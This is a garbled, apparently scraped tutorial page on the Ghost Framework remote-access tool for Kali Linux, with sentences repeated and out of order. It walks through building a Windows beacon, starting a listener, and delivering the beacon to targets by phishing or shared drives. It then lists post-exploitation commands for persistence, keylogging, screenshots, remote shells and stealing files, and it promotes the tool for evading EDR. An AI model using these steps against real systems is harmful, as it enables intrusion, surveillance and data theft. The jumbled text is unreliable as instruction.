Ghost Framework - Kali Linux Github

Ghost is perfect for CTFs, OSCP labs, and quick internal assessments where you don't want to trigger EDR with standard Metasploit patterns. Customizing from GitHub Source Since you have the repo, you can write your own modules. Ghost modules live in ghost/modules/ . The structure is dead simple:

ghost > build windows/x64 beacon.exe --upx ghost > listen http 0.0.0.0 8080 3. Deploy the agent Get beacon.exe onto your target (phishing, dropbox, or SMB share). When executed, it calls back to your Kali box. 4. Interact with the session Once a session checks in, list active sessions:

ghost > sessions Interact with session ID 1: ghost framework kali linux github

sudo python3 setup.py install Alternatively, if you want to run from source without installation:

ghost > sessions -i 1 Inside an active session, you can load modules: Ghost is perfect for CTFs, OSCP labs, and

ghost You should see the ASCII banner and a prompt: Ghost >

Install globally (recommended for Kali): The structure is dead simple: ghost > build

| Command | What it does | |---------|---------------| | sysinfo | OS, hostname, architecture, uptime | | persist | Install startup persistence (Registry/Run key) | | keylog | Capture keystrokes from the target | | screenshot | Grab remote desktop (Windows GDI) | | shell | Drop into an interactive cmd.exe | | upload /local/path /remote/path | Exfil tools | | download C:\secret\data.txt | Steal files |